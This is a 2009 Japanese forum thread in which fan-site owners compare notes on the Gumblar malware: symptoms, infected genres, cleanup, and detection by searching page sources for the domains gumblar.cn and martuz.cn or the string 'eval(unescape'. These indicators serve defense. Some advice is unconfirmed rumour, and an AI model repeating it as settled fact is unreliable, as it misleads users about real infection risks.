ノートンさんではなくAVG(って名前だったと思う)というウィルス対策ソフトを
入れてたんだけど、avast入れる前にアンインストール済み。
黒い画面にはメモリサイズやらポートがどうのってのが英語で書かれてて
device listing.....
って書いてある。
今までも似たようなのは時々でてたんだけど、その時は
F1押してコンテイニューF2でセットアップみたいなのがあったけど今回はなにもなし…。
905 :
GENO:2009/05/17(日) 04:44:52 ID:kWWUBIY10
あれ900だ。スレ立て初めてだからちょっと待っててくれ。
テンプレは
>>735に前スレ足したくらいでおk?
906 :
GENO:2009/05/17(日) 04:45:49 ID:ftzmyvI20
未だに
>>889みたいな質問するとか、
スレ全部見ろとは言わんが、なんでテンプレ部分やまとめサイト位見ないんだ?
907 :
GENO:2009/05/17(日) 04:46:00 ID:CSU66a7c0
>>898 え、マジで?
最初感染サイトをサイト名でぐぐった時点で警告出まくったからそうなんだーと思ってた
あれは過剰反応か。
908 :
GENO:2009/05/17(日) 04:46:14 ID:RXQP0KHu0
感染しちゃうと再起動できなくなるん?
909 :
GERO:2009/05/17(日) 04:47:28 ID:QIT02HZwP
火狐のgooooooogleの先読みは結局弄って無効にするのも意味ないってことになったのか
910 :
GENO:2009/05/17(日) 04:48:45 ID:2UTMQUb80
>904
セーフモードで起動して一旦それアンインストールしてみたら?
それでもダメだったらリカバれ
911 :
:2009/05/17(日) 04:52:25 ID:AOBhVWJb0
>>905 うん。で
>>3にこれを
主な症状
・感染後にFTPに接続するとログイン情報が送信され勝手にFTP上のファイルを改竄される
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集している恐れ
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
912 :
GENO:2009/05/17(日) 04:53:54 ID:j8yb3I9zO
>>908 全員が全員同じ症状が出るわけでは無い
PCによってバラバラ
けど、やたらと「〜じゃないから大丈夫だよね」とかレスする人が多いなぁと
今回感染していなかったから今後も安心とは思わず警戒心を持ち続けて欲しいなぁ
これ以外にもウィルスは無限にあるし
913 :
GERO:2009/05/17(日) 04:58:45 ID:QIT02HZwP
>>909 と思ったらまだこれも必要か
どっちがどっちかw
914 :
GENO報告:2009/05/17(日) 04:59:03 ID:LzoLdThPO
sqlsodbcやコマンドとか、感染症状に引っ掛かかりまくり感染濃厚だったので
自サイト確認しようと思ったけど
まとめサイトに載ってる感染チェッカーがうまく動いてくれないから
自サイトのソース虱潰しにあたった…ら感染してた
全部のファイルじゃなくて全体の約7〜8%くらい
パッと見で無いからって安心しないほうがいいかも
ちなみに最近アップしたファイルはまったく感染してなくて、4月半ば頃のがダメだった
ただ同じ日にアップしたのでも感染してるのとしてないのがある
感染してるページは他ページより明らかに重かった
今からどーしてもいるファイルだけバックアップとってクリーンインスコしてサイトに謝罪説明載せてくる
こりゃ今日は潰れるな
このスレ知らなかったら二次災害広げるとこだった
スレの皆さんやまとめの中の人に感謝
皆さんも気を付けてください
>>3 ジャンルは以前出ていましたがポケモソです
915 :
GENO:2009/05/17(日) 04:59:51 ID:RXQP0KHu0
78にもあったけど、
>とりあえず感染したら 必要なファイルは外付けに移動
これはアリなのかな?
外付けにウイルスがうつるんじゃなかろか…
916 :
GENO:2009/05/17(日) 05:03:17 ID:CSU66a7c0
>>914 最近のが感染してないっていうのは「まだ改竄されてない」だけだね。
>>910 セーフモードで起動できなかった…orz
先日内蔵CD-RWドライバが認識されなくなったのでリカバリーCD読めないんだ。
買い換えようと思って外付HDDにデータ移す前に最終チェックしようとしたんだけど、裏目にでたみたい
918 :
GENO:2009/05/17(日) 05:12:01 ID:yvGZdY1I0
>・一部のアンチウイルスソフトが更新不能
具体的にどのソフトだよ…orz
>>915 現段階ではしない
不安ならDVDか何かにバックアップしろ
適当なクラスタに隠蔽して書き込めるHDDと違ってゴミが入り込む余地は無い
920 :
:2009/05/17(日) 05:21:29 ID:krnr9W4t0
921 :
GENO:2009/05/17(日) 05:22:55 ID:LzoLdThPO
>>916 補足ありがとうございます
他のファイルに被害が及ぶ前にサイトに説明をアップできるよう頑張ります
922 :
GENO:2009/05/17(日) 05:23:27 ID:9waC8z5y0
firefoxのアドオンの「noscript」って対策にはなるのかな?
923 :
GERO:2009/05/17(日) 05:25:47 ID:QIT02HZwP
>>922 オプションから有効を切っても同じと見たのでそれでもいいんじゃない
924 :
GENO:2009/05/17(日) 05:27:23 ID:7bIAj8MN0
普通にjavaスクリプトを無効にすりゃいいんじゃないの?
何故あどおん
925 :
GENO:2009/05/17(日) 05:28:01 ID:lMzpo2lq0
創作イラスト
うみねこのなく頃に
で感染発見。
926 :
geno:2009/05/17(日) 05:28:12 ID:radNm57b0
粘には燃を
927 :
GENO:2009/05/17(日) 05:33:56 ID:CSU66a7c0
>>924 サイト毎、オブジェクトごとに有効無効の切り替えがワンタッチでできるからだと思う。
逆に言うと、なんでもかんでも有効にしちゃうタイプの人は使わない方がいいわけだが。
928 :
geno:2009/05/17(日) 05:36:58 ID:BWln0wVl0
firefoxの先読みが結局停止したほうがいいのか意味ないのかがわからない
確定情報とれるまではどの道停止しといたほうがベターってこと?
929 :
Geno:2009/05/17(日) 05:38:41 ID:1Y3MSE7dO
一週間ほど前に歴史ジャンルのサーチを開いたらavastがトロイを検出したことがあったんだが、あれはもしかしてこのウィルスだったんだろうか?
感染ジャンル一覧には載っておらず、自分のパソコンは白
もう一度確かめて一覧に載せてもらった方がいいだろうか
930 :
GENO:2009/05/17(日) 05:41:10 ID:Ue61uvUR0
特に何も進展無いのに進み早いわ
931 :
GENO:2009/05/17(日) 05:43:41 ID:pXdD/uNN0
>>928 安全側に倒そうとするとキリがないけど、気になるなら切ったらいいと思う。
どうせブロードバンドだし先読みの効果は大したもんじゃないだろうから。
あれはサイト側がタグなりヘッダなりで指示してないかぎり先読みしないし、
先読みでキャッシュされても開かなきゃ問題は起きない。
>>929 ジャンル一覧って誰か確認してるのかな。それほど深刻に考えなくてもよさげ。
932 :
GENO:2009/05/17(日) 05:44:58 ID:DfnjtjGM0
カスペで完全スキャンしたら、赤くなって
>>464と同じく、全部ノートンのだった。
サイトで、ウイルスのことと、その確認と対策をとったことに触れようかと思ったけど
PCからになるから、今はupしない方がいいのかな?
みんな更新休んでる?
933 :
GENO:2009/05/17(日) 05:49:00 ID:7FPyaWiw0
感染してなけりゃ更新すればいいじゃない。
934 :
GENO:2009/05/17(日) 05:50:21 ID:CQOcHoE60
現時点で感染してないの確認して、自分のサイトから
まとめサイトにリンク張っておいた。それ以外は通常更新
935 :
GENO:2009/05/17(日) 05:51:07 ID:t+QmiTuBO
即刻更新すべきだと思う
二次感染者いたら事だよ
937 :
geno:2009/05/17(日) 05:51:20 ID:BWln0wVl0
確認はしてほしいけど
>>929が直接行かなくてもチェックはできる。
以下コピペ
サイトが感染してるのかわからない人は
http://wepawet.cs.ucsb.edu/ にアクセスするといいかも、とのことです。
ここで「URL」と書かれている右のフォームに
感染が疑われるURLを入力。
「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
「Submit for analysis」をクリック。
すると解析結果が出るので、Ctrl+Fをタイプしてページ内を「gumblar.cn」「martuz.cn」で検索。
(何も見つからなければ少なくとも現在は感染していない。
見つかればそのサイトは感染している。 )
938 :
GENO:2009/05/17(日) 05:54:59 ID:Ykec17tTO
939 :
GENO:2009/05/17(日) 05:55:44 ID:28MNX8DRO
>>900 乙です
自分は白だったし日記で注意喚起も対策も出来ることは全部したけど
念のため収束するまでは更新もPCつけるのも休んでる
感染確認されてるジャンルだから今更新しても人こなそうだしなぁ
940 :
GENO:2009/05/17(日) 05:57:52 ID:krnr9W4t0
何らかの方法で(「リンク先を保存」など)ページを開かずにダウンロードして、
メモ帳等でソース自体を直接調べて特有のおかしな記述がないか探すことも出来る
保存したhtmlを間違えてブラウザで開くと大変だけど
941 :
GENO:2009/05/17(日) 05:59:09 ID:yippgSaO0
ああやっと追いつけた…
質問なんだが VirSCAN.org
ttp://www.virscan.org/ で調べるのって有効?
とりあえず先ほど話題になってたkernel32.dll、自分も2009/03/21 23:07:24だったので
いろいろやってここに辿り着いて、調べてみたらマルウェアはないって言われた
その他ノートン2009、avast、カスペオンラインスキャンで調べたときも反応なし。安心してよさげかな
942 :
GENO:2009/05/17(日) 06:00:30 ID:zDtwRBmVO
sqlsodbcも異常無し
コマンドプロンプトもレジストリエディタも起動して
まー大丈夫だろと思ってサイト開いて
ソース確認したら見覚えのないスクリプトがあって泣きそうになった
と思ったらただの広告で脱力した
マジ勘弁してくれよFC2…
もうJAVAスクリプトの記述見るだけで嫌な汗かくわ
943 :
GENO 報告 ←と入れましょう:2009/05/17(日) 06:01:55 ID:XO4QqA4D0
>>3 ・創作イラスト系サイト
と
・うみねこのなく頃に の同人サイト
で感染発見、でいいのでしょうか?
>>925
944 :
GENO:2009/05/17(日) 06:01:57 ID:U33DfpPQ0
いつになったら収束するんだろう
拡大防ぎつつワクチン出るの待つしかないんだろうけど
945 :
GENO:2009/05/17(日) 06:02:12 ID:7bIAj8MN0
FC2・・・
946 :
940:2009/05/17(日) 06:02:23 ID:z6BofXlS0
訂正
保存したhtmlを間違えてブラウザで開くと大変だけど
↓
そのページが感染していた場合、保存したhtmlを間違えてブラウザで開くと大変だけど
あとそのサイトのページのうち1ページだけ安全と確認しても
他のページがどうなってるかわからないよね
947 :
GENO:2009/05/17(日) 06:05:49 ID:YDbXlkzx0
eval(unescapeなんてそうそう書かないからこれだけ弾けばいいかな
948 :
GENO:2009/05/17(日) 06:08:09 ID:yoZbWcvq0
evalは特徴的すぎるからそのうち変えてくるんじゃないかな。
949 :
GENO:2009/05/17(日) 06:10:40 ID:XJ6Ixs/70
ついさっき知ってwiki読んできたんだけど
基本JavaScriptオフにしてる人は勝ち組かな
950 :
g:2009/05/17(日) 06:11:38 ID:jpopUHeK0
東方(エロ男性向け)で感染確認('A`)
951 :
GENO報告:2009/05/17(日) 06:13:05 ID:U33DfpPQ0
>>950 報告は名前欄に入れてください
東方(男性向け・エロ)で感染確認
952 :
GENO:2009/05/17(日) 06:13:13 ID:YDbXlkzx0
>evalは特徴的すぎるからそのうち変えてくる
こんだけ手の込んだウィルス出してるってことはそうよね〜
そのくらいするよね〜
悩ましい
953 :
GENO:2009/05/17(日) 06:13:40 ID:FG7fxUkt0
せっかくのJPOPなIDが
954 :
geno:2009/05/17(日) 06:16:54 ID:jpopUHeK0
955 :
GENO:2009/05/17(日) 06:20:01 ID:7bIAj8MN0
これは二次創作への警告である。
とかだれか声明だしたらおもしろいな
956 :
GENO:2009/05/17(日) 06:27:04 ID:z6BofXlS0
小林製薬がやられて
今、成美堂出版がやられてる状況で…w
>>943 そうです。その2ジャンルで感染発見しました。
958 :
GENO:2009/05/17(日) 06:36:41 ID:xeHWSKXvO
みんなおはよう
1時〜6時半の間に大きな進展とかあった?
マカフィーが入ってるんだけど、これは最新版に更新したところで機能してないって考えてOK?
ウイルスバスター入れたいけど、ググることもためらわれるし…
店でセキュリティソフトを買うまで、ネットできないのか……
959 :
GENO:2009/05/17(日) 06:38:55 ID:L8CKjorI0
ネットゲーム(T/a/l/e/s/W/e/a/v/e/r)の同人サイトで感染みつけた
けっこう有名なサイトさんみたいだから広まるかもorz
とりあえず管理人さんにメール
リンク貼ってる知り合いにもメールしたけどどこまで抑えられるか…
960 :
GENO:2009/05/17(日) 06:41:39 ID:yippgSaO0
今気づいたんだが株式会社まどかって美蕾の親元のことだったのか
株式会社まどかのドメインと美蕾ブランドのドメインとあるけど、これ美蕾は大丈夫ってことなのか…?
962 :
GENO:2009/05/17(日) 06:43:17 ID:50pyut5z0
自分のサイトも感染していたんだが
こんな時に限ってパスワードを紛失してしまい削除が出来ない
サーバに問い合わせたが郵送で一週間かかるオワタ
過疎サイトだったのがせめてもの救いか…
963 :
geno:2009/05/17(日) 06:43:26 ID:9SZ0CANWO
トライアル版DLしちゃえば?
自分はカスペのトライアル版昨日いれたよ。
964 :
GENO:2009/05/17(日) 06:43:56 ID:yoZbWcvq0
>>958 進展は特にないと思う。
感染せず対策済みならマカフィーが対応するまで待てばいいんじゃないか。
待ってる間ネットするかしないかは自由だし、対策してればそれほど心配はない。
965 :
:2009/05/17(日) 06:45:22 ID:z6BofXlS0
>>958 ウイルスバスターがいいってソースあったっけ?
それより今回は市販ソフトの面々より
無料ソフトであるavast!が一番対応してたというおもしろい状態
あと別にググるくらいなら大丈夫だぞ
966 :
960:2009/05/17(日) 06:50:19 ID:yippgSaO0
ごめん自分で確認した
まどかの方はソース読もうと思ってページ保存しようとしたらavastに怒られた
美蕾は無反応だったよ
967 :
GENO:2009/05/17(日) 06:50:51 ID:H/ASJoLH0
バスター・ノートン他有名どころもこれに関しては完全に後手後手らしいね
早い段階から検出できたのがカスペルスキーとavast!だけだとか
968 :
GENO:2009/05/17(日) 06:54:17 ID:FnPZ+X/U0
怖くてググれないって人はw3mとかlynxとか入れたらいいんじゃないか
見られないサイトもあるけど、調べ物するくらいは出来るよ
969 :
GENO:2009/05/17(日) 06:55:20 ID:kTxyYlV/0
>>966 ただまどかの方が感染してるって本スレで報告されたのが木曜で
その後本スレ内ではスルーだったから
木曜時点での美蕾サイトがどうだったのか気になるな
970 :
:2009/05/17(日) 06:57:53 ID:8Mc+KfJt0
>>966 ソース見た。確かに前者は感染してる
後者は少なくともトップページは感染していない
971 :
報告:2009/05/17(日) 06:59:06 ID:9nhWTEIz0
伺かのゴースト配布サイトで感染確認
972 :
geno:2009/05/17(日) 07:05:44 ID:hqnP7TwX0
973 :
GENO:2009/05/17(日) 07:13:42 ID:/RlG7t1x0
>>965 23 名前:以下、名無しにかわりましてVIPがお送りします [sage] 投稿日:2009/05/17(日) 03:14:05.95 ID:5FyWFSdq0 New!!
火狐使いは特に注意。対策しないと感染サイト名をググっただけで感染します
563 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:50:34.81 ID:K/FFIX2k
>>516 FireFoxの先読み機能を切っておけ
google検索上位に感染ページがランクインしたとたんにウィルスロードしはじめるよw
アドレス欄にabout:configで
network.prefech-nextをfalseだ
974 :
GENO:2009/05/17(日) 07:20:12 ID:B/lYlGwY0
すまんWiki読んだがいまいちはっきりしない
とりあえず行きたいとこがあるときに
>>937でセーフなら大丈夫なんか?
それと万一自分が感染した場合に心配しなきゃならんことってなんだ?
サイト持ちは更新ご法度ってことはわかったが、ROMの受ける被害は?
(Winに記憶させたパス抜かれるとかPC内のデータ改ざんされるとか)
975 :
GENO:2009/05/17(日) 07:21:28 ID:poDqEOH00
近くだから読むべきだった
975サンクス
しかし937のサイト試してみてるがクソ重いな
やっぱ人が殺到してんのかな
977 :
:2009/05/17(日) 07:25:07 ID:8Mc+KfJt0
>>974 とりあえずJavaScript切ってあればおそらく感染したサイト開いても大丈夫(確証はない)。
ちなみに
>>937でわかるのはあくまで調べたページのみで、そのサイトの他のページが
どうであるかはわからない。
978 :
GENO:2009/05/17(日) 07:26:41 ID:nyEd19m/P
>>973 おそらくウイルスをロードしてるんじゃなくて、ウイルスを読み込ませるためのjsを
ロードして(この時点で実行はされない)、そのjsにアンチウイルスソフトが反応する
だけっぽいような…気がする。
979 :
GENO:2009/05/17(日) 07:29:00 ID:6Jb1kUJ50
>>3 まとめサイト管理更新乙。
細かいことだけど
まとめサイトの小野不由美の後ろのカッコ、
検索サイトにするかサーチサイトにするか総合サーチにするか
とにかく検索サーチという表現がムズムズするので
次更新の折にでも直してもらえると嬉しい
個人的な事なので無視可。
980 :
ゲノ:2009/05/17(日) 07:40:44 ID:UZNEyrGC0
ジャンルの違いもあるんだろうけど
正直自分の見える範囲だと同人板だけで急に盛り上がったようにしか見えない。
本スレ行ったら同人板の奴らが乗り込んできて急に加速したとか文句言われてたし
まとめからリンクされてる詳しいサイトも急にアクセス増えたって迷惑がってたよ
周知に効果あるだろうからって無関係なピクシブに凸したなんて話まであったよ……。
確かに周知は大事だけど、騒いで広めれば良いってものじゃないし
「ウイルスに気をつける」「アップデータは常に最新に」
こんなのはウイルスが流行ってなくてもやっておかなければならないことで
サイト管理人なら尚の事。だからこそ敏感で盛り上がってるんだろうけどさ。
迷惑かけるようなやり方や不安を煽るような真似だけは勘弁。
981 :
おっぱい:2009/05/17(日) 07:44:22 ID:18p7vhL80
男性向けエロと腐女子系とどっちが感染多いの
話はそれからだ
982 :
GENO:2009/05/17(日) 07:44:48 ID:ADDeF/hJ0
983 :
GENO:2009/05/17(日) 07:46:28 ID:06igU9wW0
一例っておい
984 :
GENO:2009/05/17(日) 07:47:32 ID:rPCEZYSS0
>>980 同人サイト、特に女性向けは閲覧者がサイト持ちである可能性が高い
つまりこのウィルスが爆発的に広がる可能性が高い
同人板の住人はサイト閲覧もするし、かつサイトを持っている人間が多い
つまりこのウィルスに対して危機感を抱く人間が多い
他の板とはちょっと事情が違うよ
>>980 お前海外旅行にでも行って帰ってきたばかりか?
986 :
ゲノ:2009/05/17(日) 07:51:18 ID:UZNEyrGC0
>>980です
>>984いやそれは解かってるんだけど熱くなられすぎると
逆に引くような人もいるでしょ?
見えない敵と戦う戦士みたいなの?
逆効果になりかねないくらい熱すぎるよ今の騒ぎっぷり
>>985 ニュー速で祭ってた時にちょっと参加してたくらい前から知ってる
だから余計に一歩引いてるのかもしれないかな
987 :
GENO:2009/05/17(日) 07:51:28 ID:c9KikWou0
>>982 DLしないでソースチェッカーオンラインにでも突っ込んだほうがよくない?
988 :
GENO:2009/05/17(日) 07:52:50 ID:ekHm3UMw0
特定のサイト閲覧のときだけ気を付ければいいってわけじゃなくて
ぶっちゃけほぼ全てのサイトをウイルス感染の危険性ありと疑って掛からなきゃならんのがな
大手ベンダーが対応するまではネットしないのが最善とかぬるぽ
989 :
GENO:2009/05/17(日) 07:54:32 ID:B/lYlGwY0
XPSP2、IE6.0&Sleipnir1.66だがカスペのオンラインスキャンがアップデートできないな
>>148>>166 Ver6の頃は普通に使えてたんだがなぁ
990 :
GENO:2009/05/17(日) 07:58:17 ID:ADDeF/hJ0
>>987 うーんまあそうなんだけど、感染してるサイトでも
[このアドレスの安全度 82%]とか出るのよ
ちゃんとソース読めば関係ないんだけどね
991 :
GENO:2009/05/17(日) 07:59:05 ID:gzda5uxkO
992 :
GENO:2009/05/17(日) 08:00:23 ID:c9KikWou0
>>990 ああ書き忘れたっていうか配慮が足りませんでした
その安全度のところは今回マッタク使えないけど、ソース見るにはいいかなあと
993 :
GENO:2009/05/17(日) 08:01:51 ID:kTxyYlV/0
>>980 同人だけ騒いで見えるのは、他だと閲覧のみって場合が多いからじゃね?
女性向けでいえば、BLとノマカプやアニメとゲーム系と
ジャンル間でギスギスしやすい所が責任の擦り付けしないで
報告上げてるってだけで感心するけどな
994 :
GENO:2009/05/17(日) 08:04:32 ID:ADDeF/hJ0
>>992 いやこちらもすいません。
ソース見るだけならソースチェッカーオンラインのほうが全面的にいいです、はい。
995 :
GENO:2009/05/17(日) 08:13:58 ID:zDtwRBmVO
何が分かってんだ
引くなら勝手に引いてりゃいいじゃん
大体実際見えない敵にも等しいし
クール気取るのは勝手だが
それで対策怠って感染してばらまくのはやめてくれよ
どうせサイトなんざ持ってないんだろうが
996 :
GENO:2009/05/17(日) 08:17:40 ID:os1adUJy0
Mac板で同人テンプレ使って
デマまいてる馬鹿、いい加減にしろ。
注意喚起するなら正しい知識をもとにしてやれ
>>980 セキュリティソフトでも対応できないようなもんが急速に規模拡大してるのにそれか
ましてや個人サイトの範囲では収まらず一般人が見るような大手の公式サイトまで感染してる状況で
リアルの豚インフルでクール気取って無警戒なバカと変わらん
998 :
ゲノ:2009/05/17(日) 08:19:59 ID:UZNEyrGC0
そもそもこのウイルス出たのってもう一ヶ月以上前なんだよ
マルウェア系はあんまり対応されないのはいつものこと
別に楽観視しろと言ってるわけじゃない。
パス抜きウイルスは度々流行ってるけど、一般の人はかなり冷めてる
抜かれるパスに該当する何かを利用してなきゃ被害無いから、そのうちアンチソフトが対応してくれるまでそのままで。
亜種によってブルスク被害が出ているって話がホントなら今回はそうでもないだろうけど。
あちこちのマルチポストもウザがられてる。他所の板や感染してない大手サイトに警告の協力要請とかもうね。
警告にいくにしたってもう少し行儀良くしてほしいよ。
この板の内と外で温度差があることは自覚してくれ。
実際恥ずかしくてサイトの警告も下げて知らんぷりしたい管理人も出はじめてるよ
ここだってそのうち落ち着くと思ってるよ。いつまでも燃えてられるわけが無いもの。
週末を前に盛り上がったのが不運だな
999 :
:2009/05/17(日) 08:20:28 ID:QQYHhud10
>>980はそれほど間違ったこと言ってない
迷惑かけるようなやり方や不安を煽るような真似はしないことだ
おはようございます
遊びに来ました(´`/仝)
1001 :
1001: